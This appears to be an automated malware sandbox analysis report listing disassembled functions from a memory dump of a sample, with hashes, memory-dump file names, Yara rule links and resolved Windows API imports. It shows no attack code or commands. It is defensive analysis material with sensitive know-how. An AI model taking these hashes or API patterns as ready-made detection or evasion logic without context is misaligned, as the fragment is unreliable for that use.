                                                                                                                        • Opcode ID: c093fbe60df72634ee81267e716a17191ba0b5ae86ed72f8f9866a7166f4e77c
                                                                                                                        • Instruction ID: 6d137b5e7147fe9b722a562813be63ff153078345ecf33b64f051dac354e8ae3
                                                                                                                        • Opcode Fuzzy Hash: c093fbe60df72634ee81267e716a17191ba0b5ae86ed72f8f9866a7166f4e77c
                                                                                                                        • Instruction Fuzzy Hash: F73205A284E7C28FC3178B348C66591BFB1AE6321871E85DBC0C1CF5A3E2195D5AD762
                                                                                                                        Function 02DD5B6F Relevance: .6, Instructions: 606COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: a18e7bb7c2c42d1902aff7cdab2f32fbef15b0e2cf6e19f50b6dfc23c9c72e89
                                                                                                                        • Instruction ID: 27352dee8e992f7320d5f58b80a161fc6c29886911e00db436555e353192d6cf
                                                                                                                        • Opcode Fuzzy Hash: a18e7bb7c2c42d1902aff7cdab2f32fbef15b0e2cf6e19f50b6dfc23c9c72e89
                                                                                                                        • Instruction Fuzzy Hash: 2A32C071608B459BC725DF68E48076ABBE9FF88308F444A2DE8A58B381D770DD45CBD2
                                                                                                                        Function 02DDDD5B Relevance: .4, Instructions: 437COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 51f8d9063bc82676a5307432183369734bf664b3393a643c02daa012ce37ec01
                                                                                                                        • Instruction ID: 8ff56f1bb405ba4385d7efbe64ad0bb4d9d4603fe8f1255eda4951f71f060b58
                                                                                                                        • Opcode Fuzzy Hash: 51f8d9063bc82676a5307432183369734bf664b3393a643c02daa012ce37ec01
                                                                                                                        • Instruction Fuzzy Hash: 98027D717046518FD318CF2EE880636B7E1AF8A301B46863EE4D5C7395EB34E926CB95
                                                                                                                        Function 02DDD7E4 Relevance: .4, Instructions: 377COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: ae54c0c007aacb93a7dd55fc151a9a0813301b4ecfdd70e7c81fd1d8629b8821
                                                                                                                        • Instruction ID: 4c4e04f6816288a7b970f67ae134d93e369559c212f6f9ca93fccf76235d1aa6
                                                                                                                        • Opcode Fuzzy Hash: ae54c0c007aacb93a7dd55fc151a9a0813301b4ecfdd70e7c81fd1d8629b8821
                                                                                                                        • Instruction Fuzzy Hash: FEF16C756142548FC714DF1DE89187BB3E1EB8A300B460A2EF1C2C7391DB74EA1ACB66
                                                                                                                        Function 02DE8907 Relevance: .4, Instructions: 371COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: b12bffaf184e2118b61cdb5db2232eefa3f480fab81911404f7d7ec5672b2d9e
                                                                                                                        • Instruction ID: c7b20471d1c060aa58b6763351a6d0397b45ca69bd294928364a89f9bda91b56
                                                                                                                        • Opcode Fuzzy Hash: b12bffaf184e2118b61cdb5db2232eefa3f480fab81911404f7d7ec5672b2d9e
                                                                                                                        • Instruction Fuzzy Hash: FAD15C729087158FCB21EE28C8846AEB7E5FF94394F440A2DE896D7360E730DD05DB92
                                                                                                                        Function 02D3C98F Relevance: .3, Instructions: 316COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 9f1948302b2909565ffaec1bc44114e62a7ee68aa39f2c33fc1b5e59dc74898b
                                                                                                                        • Instruction ID: 277d881f43f5e4de1522bc264a595aa38c23a638420e67b7b9de843d41e39bfb
                                                                                                                        • Opcode Fuzzy Hash: 9f1948302b2909565ffaec1bc44114e62a7ee68aa39f2c33fc1b5e59dc74898b
                                                                                                                        • Instruction Fuzzy Hash: 41B1466490E3C58FC7032B7888751963F71DF4731875A4AD7C584CF2A3C569AC2ADBA2
                                                                                                                        Function 02D3C9DF Relevance: .3, Instructions: 304COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: ff6a89de3862892f8417cbc7ebe7f18fa3f3c0dd5d5ea9d8ccd6ca2ccd0b5062
                                                                                                                        • Instruction ID: f84bcebcc6e9ed10368e0184293744f98ac9b2db2d18635aa21b9fa7a2041d74
                                                                                                                        • Opcode Fuzzy Hash: ff6a89de3862892f8417cbc7ebe7f18fa3f3c0dd5d5ea9d8ccd6ca2ccd0b5062
                                                                                                                        • Instruction Fuzzy Hash: 11B1266490E3C18FC7032B7998741963F31DF4B31475A4AD7C584CF2A7C569AC1ADBA2
                                                                                                                        Function 02DD4601 Relevance: .3, Instructions: 276COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 1d5f87b89f6cc3a45a9bf331663a41d894a757e8db0ddd404c7656d5df1518eb
                                                                                                                        • Instruction ID: 3e3dfc4473a4b6c4095c011e32387ba508aa1eefdc6a22fd81e73500b5e9b31f
                                                                                                                        • Opcode Fuzzy Hash: 1d5f87b89f6cc3a45a9bf331663a41d894a757e8db0ddd404c7656d5df1518eb
                                                                                                                        • Instruction Fuzzy Hash: DBB1833911469A8ACB05EF28C4913F63BA1EF6A300F4851B9EC9CCF756D3358506EB74
                                                                                                                        Function 02E09662 Relevance: .3, Instructions: 269COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 10c23660bdf4a559c67b3dd21211c83afc8534fe451efaff8b0d30b37073b707
                                                                                                                        • Instruction ID: 9886c2e877911c52d117b5f84656f1827de1cb8efc98a0bae536955cf57d3f4a
                                                                                                                        • Opcode Fuzzy Hash: 10c23660bdf4a559c67b3dd21211c83afc8534fe451efaff8b0d30b37073b707
                                                                                                                        • Instruction Fuzzy Hash: 9FB107365506089FD715CF28C4CABA57BA0FB45768F29D658E899CF2E3C335E982CB40
                                                                                                                        Function 02DF43CB Relevance: .2, Instructions: 237COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: da6bc0b681a35a8a8cd82b5b62752965acc1f5aabf11132faead2372da36057a
                                                                                                                        • Instruction ID: 110c520e90f783ba98f41b3abbb7838c15362a1d4646e5d71621354a66c022c7
                                                                                                                        • Opcode Fuzzy Hash: da6bc0b681a35a8a8cd82b5b62752965acc1f5aabf11132faead2372da36057a
                                                                                                                        • Instruction Fuzzy Hash: 4561587160060966EAF8AE685894BBF7395EF41708F474419EF82FF380D791DE42CA2D
                                                                                                                        Function 02DF4628 Relevance: .2, Instructions: 237COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: dcaaf3a538fb6447e3283ddd15f45a67438a23807e0f4513107e056d33e47a72
                                                                                                                        • Instruction ID: ea5610bbc2a4530eb9a241c4481000a2744c8f72fec4873615c909d186c60995
                                                                                                                        • Opcode Fuzzy Hash: dcaaf3a538fb6447e3283ddd15f45a67438a23807e0f4513107e056d33e47a72
                                                                                                                        • Instruction Fuzzy Hash: A2617A3160068866DEF89A289894BFF63A9EF0270CF074519EB82DF390DB55DD41CB9D
                                                                                                                        Function 02DDE53D Relevance: .2, Instructions: 186COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 6f0963373f33ef73dbd289fc78ad1b7818d684b7f305e862658b304cf2148f24
                                                                                                                        • Instruction ID: af941638f0bbe1c5c99c02442b10acc583b73cd913109daab3d9b2e5a89b7098
                                                                                                                        • Opcode Fuzzy Hash: 6f0963373f33ef73dbd289fc78ad1b7818d684b7f305e862658b304cf2148f24
                                                                                                                        • Instruction Fuzzy Hash: 76614C325083059BC708DE34D581A5BBBEAEFDC754F540D2EF4999A250EB30EE088B92
                                                                                                                        Function 02D320C4 Relevance: .1, Instructions: 94COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                                                                                        • Instruction ID: d9ca5c35b085eece62e9f9345e2df5b5b2dbbbf6d6fdc43b5a6e4acac797e09a
                                                                                                                        • Opcode Fuzzy Hash: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                                                                                        • Instruction Fuzzy Hash: 44317E3213659B4EC7088B3CC8514ADAB93BE937353A843B7C071CB5D7D7B5A26E8290
                                                                                                                        Function 02DEE6E0 Relevance: .1, Instructions: 76COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                        • Instruction ID: 1ada1e41da0d71ebc0e22b16d736641f97ae99b7e62cbbcb3e42d57911d2ade2
                                                                                                                        • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                        • Instruction Fuzzy Hash: 17113BB720009183DF55BA2DD8B66B7A795EAC513973C4379C3434B758E322EC41D500
                                                                                                                        Function 02DF9AE4 Relevance: .0, Instructions: 21COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: d420c085b4cbd1a0f14619f21da79696596f2760b2d56dfa882e7987f99df3a2
                                                                                                                        • Instruction ID: 9c082de22a7d19bc7b57dc7f11cbc7112b7248904a078793eec1d1a006ba820e
                                                                                                                        • Opcode Fuzzy Hash: d420c085b4cbd1a0f14619f21da79696596f2760b2d56dfa882e7987f99df3a2
                                                                                                                        • Instruction Fuzzy Hash: 35E0B631905208BFCF516F54ED58A883B6EEF40792F064464FA098A632CB35ED82DA98
                                                                                                                        Function 02D3D294 Relevance: 42.1, APIs: 1, Strings: 23, Instructions: 141COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 02D3D29D
                                                                                                                          • Part of subcall function 02D3D268: GetProcAddress.KERNEL32(00000000), ref: 02D3D281
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                                        • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                                                                                                        • API String ID: 1646373207-1918263038
                                                                                                                        • Opcode ID: 34e46bfb3be8ec89e852492262574ff37e5cd0ed23aa9580b35764c4c07104aa
                                                                                                                        • Instruction ID: 42b8942e926727c9139c1d69babbff36cabc51b257b85e11523b126ffc96773f
                                                                                                                        • Opcode Fuzzy Hash: 34e46bfb3be8ec89e852492262574ff37e5cd0ed23aa9580b35764c4c07104aa
                                                                                                                        • Instruction Fuzzy Hash: 4941BC67E993089B620B6B6DF410427B7DFE785B147A0C61AF804DB784DA70FC518E39
                                                                                                                        Function 02D46ED8 Relevance: 24.5, APIs: 7, Strings: 7, Instructions: 32libraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleA.KERNEL32(ole32.dll), ref: 02D46EDE
                                                                                                                        • GetProcAddress.KERNEL32(00000000,CoCreateInstanceEx), ref: 02D46EEF
                                                                                                                        • GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 02D46EFF
                                                                                                                        • GetProcAddress.KERNEL32(00000000,CoAddRefServerProcess), ref: 02D46F0F
                                                                                                                        • GetProcAddress.KERNEL32(00000000,CoReleaseServerProcess), ref: 02D46F1F
                                                                                                                        • GetProcAddress.KERNEL32(00000000,CoResumeClassObjects), ref: 02D46F2F
                                                                                                                        • GetProcAddress.KERNEL32(00000000,CoSuspendClassObjects), ref: 02D46F3F
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
